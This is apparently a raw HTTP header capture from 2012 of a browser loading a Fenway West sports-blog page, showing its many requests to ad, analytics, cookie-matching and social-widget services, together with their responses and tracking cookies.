Set-Cookie: ljtrtb=eJwVy0EOwyAMBdG7eB0k2xjM7y4Fcg8Q9BJV795kPW%2B%2BJPQiy1w4w2HRWTwKQAdJvFPigak7m5WREq%2Flvl33evqzrqkekTTkMiwYw0NZHw2%2BUKbknfxmB%2BlN2%2FkGzt6jQS5tvZYrs6HCJPaGSr8%2F66MgfQ%3D%3D; expires=Tue, 19-Nov-2013 04:17:43 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Tue, 20 Nov 2012 04:17:43 GMT
Connection: close
GET /b?c1=8&c2=2102&c3=0&c4=800419&c5=610742&c15=&c16=&ns__t=1353298663844&ns_c=UTF-8&c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&c9=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo HTTP/1.1

Host: b.scorecardresearch.com
GET /b?c1=8&amp;c2=2102&amp;c3=0&amp;c4=800419&amp;c5=610742&amp;c15=&amp;c16=&amp;ns__t=1353298663844&amp;ns_c=UTF-8&amp;c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&amp;c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;c9=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: UID=a2978d-195.159.219.9-1353298656; UIDR=1353298656
HTTP/1.1 204 No Content

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 19 Nov 2012 04:17:43 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /pixel;r=1153818838;a=p-1cHTv1mHJldKk;fpan=0;fpa=P0-1109205847-1353298656085;ns=1;ce=1;je=1;sr=1176x885x24;enc=n;dst=1;et=1353298663832;tzo=-60;ref=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo;url=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php;ogl=description.%2Cimage.http%3A%2F%2Fwww%252Efenwaywest%252Ecom%2Fmodules%2Fmod_raxo_allmode%2Ftools%2Fplaceholder%252Epng%2Curl.http%3A%2F%2Fwww%252Efenwaywest%252Ecom%2Fsh404sef-custom-content%2F404%252Ehtml%2Ctitle.__404__%2Clocale.en_US%2Csite_name.Fenway%20West HTTP/1.1

Host: pixel.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: mc=50a9b2e0-21a09-68164-7c0b5
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Mon, 19 Nov 2012 04:17:43 GMT
Server: QS
GET /pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.UNCONTEXTUALIZED,PUBLISHER.520266,,CAMPAIGN.610742.800419,,ADSIZE.728X90 HTTP/1.1

Host: pixel.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: mc=50a9b2e0-21a09-68164-7c0b5
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Mon, 19 Nov 2012 04:17:43 GMT
Server: QS
GET /__utm.gif?utmwv=5.3.8&utms=2&utmn=1203836228&utmhn=fenwaywest.com&utmcs=UTF-8&utmsr=1176x885&utmvp=283x133&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&utmhid=1036901304&utmr=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&utmp=%2Fmedia%2Findex.php&utmac=UA-9883006-35&utmcc=__utma%3D54302783.757114296.1353298659.1353298659.1353298659.1%3B%2B__utmz%3D54302783.1353298659.1.1.utmcsr%3D88websitedesign.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&utmu=zAAgAAAAAC~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.8&amp;utms=2&amp;utmn=1203836228&amp;utmhn=fenwaywest.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=283x133&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&amp;utmhid=1036901304&amp;utmr=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;utmp=%2Fmedia%2Findex.php&amp;utmac=UA-9883006-35&amp;utmcc=__utma%3D54302783.757114296.1353298659.1353298659.1353298659.1%3B%2B__utmz%3D54302783.1353298659.1.1.utmcsr%3D88websitedesign.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&amp;utmu=zAAgAAAAAC~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 11:57:54 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 231590
Server: GFE/2.0
GET /__utm.gif?utmwv=5.3.8&utms=3&utmn=1413525291&utmhn=fenwaywest.com&utmcs=UTF-8&utmsr=1176x885&utmvp=283x133&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&utmhid=1036901304&utmr=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&utmp=%2Fmedia%2Findex.php&utmac=UA-8771367-2&utmcc=__utma%3D54302783.757114296.1353298659.1353298659.1353298659.1%3B%2B__utmz%3D54302783.1353298659.1.1.utmcsr%3D88websitedesign.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&utmu=zAAgAAAAAC~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.8&amp;utms=3&amp;utmn=1413525291&amp;utmhn=fenwaywest.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=283x133&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&amp;utmhid=1036901304&amp;utmr=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;utmp=%2Fmedia%2Findex.php&amp;utmac=UA-8771367-2&amp;utmcc=__utma%3D54302783.757114296.1353298659.1353298659.1353298659.1%3B%2B__utmz%3D54302783.1353298659.1.1.utmcsr%3D88websitedesign.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&amp;utmu=zAAgAAAAAC~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 12:15:37 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 230527
Server: GFE/2.0
GET /pixel?google_nid=mediamath&google_cm&google_hm=NTBhOWIyZTItOWQ2OC1kNjc2LTY5MDEtM2M1ZmFmY2EyNTky HTTP/1.1

Host: cm.g.doubleclick.net
GET /pixel?google_nid=mediamath&amp;google_cm&amp;google_hm=NTBhOWIyZTItOWQ2OC1kNjc2LTY5MDEtM2M1ZmFmY2EyNTky HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:44 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Server: Cookie Matcher
Content-Length: 170
X-XSS-Protection: 1; mode=block
GET /site/4448?id=50a9b2e2-9d68-d676-6901-3c5fafca2592 HTTP/1.1

Host: tags.bluekai.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: bkc=KJpqpXU9zesRiKc8ooDOM9y1ewrO418eeYMXDf3GdOQVOcXwAnXn3wXJWoXa3OIjlbbW0Q4oCdW8Q4y26hARcichubKiXCwxIY9ShQXDjt9/wzxW8MBOIHIlG4n4GdaO2LwT9vJXwtL=; bklc=50a9b2e7; bko=; bkp1=; bku=DHz99mv03PelwF+4; bkw5=; bkdc=snv; bkst=KJhMR5Mehze9pkYSk8tUU8fljBwv9OSsdD9CWxR7UN6eYe9t1MDpBMRhBqOXeoxc9aA9e4Q=
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:43 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP=&quot;NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV&quot;, policyref=&quot;http://tags.bluekai.com/w3c/p3p.xml&quot;
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Set-Cookie: bkc=KJhnWsHQtO41hwOX6XG9HQRsCQxQ4f6Wv7XPsMIsCxcmlXdayc9HuEI/plA/P4bDniG4V4XK/cXUDwXEJeTnDeX0FN6JkxdueIBp9FkfoM1ywWnik68a8uKQXDW6MOXGpL9xKGQJpsKYXM2rxIVdHImef/4h9qxDE7L=; expires=Sat, 18-May-2013 04:17:43 GMT; path=/; domain=.bluekai.com bklc=50a9b2e7; expires=Sat, 18-May-2013 04:17:43 GMT; path=/; domain=.bluekai.com bko=KJhnWZPQKn8ojx9g9y9Hcx1w; expires=Sat, 18-May-2013 04:17:43 GMT; path=/; domain=.bluekai.com bkst=KJhMR5Mehze9pkYSk8tUU8fljBwv9OSsdD9CWxR7UN6eYe9t1MDpBMRhBqOXeojwWsHQDsWyBDi6EeJvB5vNEesp6W6h1p4EBq161BxNEMjBu6hnEMx0+ExY3xz9bJXSzx==; expires=Sat, 18-May-2013 04:17:43 GMT; path=/; domain=.bluekai.com bkw5=KJynptOQzmnjyvEe01YQpq9IZTsOiRsEYXQOA3PEsHMYAmHNsBjC0/zi0VLhg1Vxe6suNtPRQ0aFW1w961uhQDk97RaOZZakc91e/Nxs9JjQazR=; expires=Sat, 18-May-2013 04:17:43 GMT; path=/; domain=.bluekai.com bkdc=snv; expires=Wed, 19-Dec-2012 04:17:43 GMT; path=/; domain=.bluekai.com
BK-Server: ef94
Content-Length: 62
GET /pull_sync?pid=contextweb HTTP/1.1

Host: www.wtp101.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html; charset=UTF-8
Set-Cookie: tuuid=ae5d262d-5b10-4dca-9fe0-2db3b63bfc3e; path=/; expires=Wed, 19-Nov-2014 04:17:44 GMT; domain=.wtp101.com
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Location: /pull_sync?ul_cb=1&amp;pid=contextweb
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 0
Date: Mon, 19 Nov 2012 04:17:44 GMT
GET /adi/N3814.290927.AFFIPERF.COM19/B7153410.2;sz=728x90;ord=1709586981709445095;click=http://pixel.mathtag.com/click/img?mt_aid=1709586981709445095&mt_id=239527&mt_adid=100412&mt_uuid=50a9b2e2-9d68-d676-6901-3c5fafca2592&redirect= HTTP/1.1

Host: ad.doubleclick.net
GET /adi/N3814.290927.AFFIPERF.COM19/B7153410.2;sz=728x90;ord=1709586981709445095;click=http://pixel.mathtag.com/click/img?mt_aid=1709586981709445095&amp;mt_id=239527&amp;mt_adid=100412&amp;mt_uuid=50a9b2e2-9d68-d676-6901-3c5fafca2592&amp;redirect= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: text/html
Server: DCLK-AdSvr
Content-Length: 1737
Content-Encoding: gzip
Date: Mon, 19 Nov 2012 04:17:44 GMT
GET /bh/visitormatch?tag=66900&pid=520266 HTTP/1.1

Host: bh.contextweb.com
GET /bh/visitormatch?tag=66900&amp;pid=520266 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353298784332; V=Cp3qDslEoSFB; vf=3; wf=0; pb_rtb_ev=2-535461.4608069794370173199.0.0.1353298661541|530731..0.0.1353298658421|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301.71a3945c-1742-4347-b6e7-48a1509b5fa0.0.0.1353298663243|535393..0.0.1353298658421|541254..0.0.1353298658421|537085..0.0.1353298658421|543921..0.0.1353298658421|536088..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979.5858721859426781856.0.0.1353298661823|531292.BM-00000003256334509.0.0.1353298663022|543604..0.0.1353298658421|535039..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421; 66901_300X250__POSUNKNOWNXUNKNOWN=1353298786770
HTTP/1.1 200 OK

Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-205-49-80
Date: Mon, 19 Nov 2012 04:17:43 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=Cp3qDslEoSFB; Domain=.contextweb.com; Expires=Thu, 14-Nov-2013 04:17:44 GMT; Path=/ pb_rtb_ev=2-535461.4608069794370173199.0.0.1353298661541|530731..0.0.1353298658421|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301.71a3945c-1742-4347-b6e7-48a1509b5fa0.0.0.1353298663243|535393..0.0.1353298658421|541254..0.0.1353298658421|537085..0.0.1353298658421|543921..0.0.1353298658421|536088..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979.5858721859426781856.0.0.1353298661823|531292.BM-00000003256334509.0.0.1353298663022|543604..0.0.1353298658421|535039..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421; Domain=.contextweb.com; Expires=Tue, 19-Nov-2013 04:17:44 GMT; Path=/
Content-Length: 2211
Connection: keep-alive
POST / HTTP/1.1

Host: ocsp.verisign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request
HTTP/1.0 200 Ok

Content-Type: application/ocsp-response
Last-Modified: Sat, 17 Nov 2012 22:54:21 GMT
Expires: Sat, 24 Nov 2012 22:54:21 GMT
Content-Transfer-Encoding: binary
Content-Length: 1814
Cache-Control: max-age=498997, public, no-transform, must-revalidate
Date: Mon, 19 Nov 2012 04:17:44 GMT
nnCoection: close
Connection: Keep-Alive
GET /meter.asp?site=s27fenwaywest&refer=http%3A//www.88websitedesign.com/index.php%3Fwebsite-design-and-development-services-web-company%3Dseo&ip=195.159.140.221&w=1176&h=885&clr=24&tzo=-60&lang=en-US&pg=http%3A//fenwaywest.com/media/index.php&js=1&rnd=0.8477681867847436&zyxver=1.120524 HTTP/1.1

Host: s27.sitemeter.com
GET /meter.asp?site=s27fenwaywest&amp;refer=http%3A//www.88websitedesign.com/index.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;ip=195.159.140.221&amp;w=1176&amp;h=885&amp;clr=24&amp;tzo=-60&amp;lang=en-US&amp;pg=http%3A//fenwaywest.com/media/index.php&amp;js=1&amp;rnd=0.8477681867847436&amp;zyxver=1.120524 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: IP=195%2E159%2E140%2E221
HTTP/1.1 301 Moved Permanently

Content-Type: text/html
Content-Length: 474
Location: http://b27.sitemeter.com/meter.asp?site=s27fenwaywest&amp;refer=http%3A//www.88websitedesign.com/index.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;ip=195.159.140.221&amp;w=1176&amp;h=885&amp;clr=24&amp;tzo=-60&amp;lang=en-US&amp;pg=http%3A//fenwaywest.com/media/index.php&amp;js=1&amp;rnd=0.8477681867847436&amp;zyxver=1.120524
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 19 Nov 2012 04:17:31 GMT
GET /meter.asp?site=s52bloguinbaseball&refer=http%3A//www.88websitedesign.com/index.php%3Fwebsite-design-and-development-services-web-company%3Dseo&ip=195.159.140.221&w=1176&h=885&clr=24&tzo=-60&lang=en-US&pg=http%3A//fenwaywest.com/media/index.php&js=1&rnd=0.9896234188651021&zyxver=1.120524 HTTP/1.1

Host: s21.sitemeter.com
GET /meter.asp?site=s52bloguinbaseball&amp;refer=http%3A//www.88websitedesign.com/index.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;ip=195.159.140.221&amp;w=1176&amp;h=885&amp;clr=24&amp;tzo=-60&amp;lang=en-US&amp;pg=http%3A//fenwaywest.com/media/index.php&amp;js=1&amp;rnd=0.9896234188651021&amp;zyxver=1.120524 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: IP=195%2E159%2E140%2E221
HTTP/1.1 301 Moved Permanently

Content-Type: text/html
Content-Length: 479
Location: http://b21.sitemeter.com/meter.asp?site=s52bloguinbaseball&amp;refer=http%3A//www.88websitedesign.com/index.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;ip=195.159.140.221&amp;w=1176&amp;h=885&amp;clr=24&amp;tzo=-60&amp;lang=en-US&amp;pg=http%3A//fenwaywest.com/media/index.php&amp;js=1&amp;rnd=0.9896234188651021&amp;zyxver=1.120524
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 19 Nov 2012 04:17:31 GMT
GET /?y=3&t=h&u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&r=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo HTTP/1.1

Host: dg.specificclick.net
GET /?y=3&amp;t=h&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;r=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html;charset=ISO-8859-1
Server: WebStar 1.0
Set-Cookie: ug=8TOF_vd88yhfjB; Domain=.specificclick.net; Expires=Sat, 18-Nov-2017 04:17:44 GMT; Path=/
P3P: CP=&quot;NOI DSP COR DEVa TAIa OUR BUS UNI NAV&quot;
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Transfer-Encoding: chunked
Date: Mon, 19 Nov 2012 04:17:43 GMT
nnCoection: close
GET /widgets/tweet_button.1352365724.html HTTP/1.1

Host: platform.twitter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=315569260
Last-Modified: Thu, 08 Nov 2012 09:16:01 GMT
Etag: &quot;e0131ea3511ed24fa4217f03897ea418&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 22643
Date: Mon, 19 Nov 2012 04:17:44 GMT
Connection: keep-alive
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
GET /connect/xd_arbiter.php?version=17 HTTP/1.1

Host: static.ak.facebook.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
X-FB-Debug: QpUXNDPC4a/ZS9XMuzc2WDBWEZ8S2oHPsfImau8uouU=
Content-Length: 9847
Vary: Accept-Encoding
Cache-Control: public, max-age=30755915
Expires: Sun, 10 Nov 2013 03:36:19 GMT
Date: Mon, 19 Nov 2012 04:17:44 GMT
Connection: keep-alive
GET /navigation/blogimages/football/thisgivensunday.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:44 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:02 GMT
Etag: &quot;226b3a-4a3f-4ca2be63cee80&quot;
Accept-Ranges: bytes
Content-Length: 19007
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /navigation/blogimages/baseball/theoutsidecorner.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
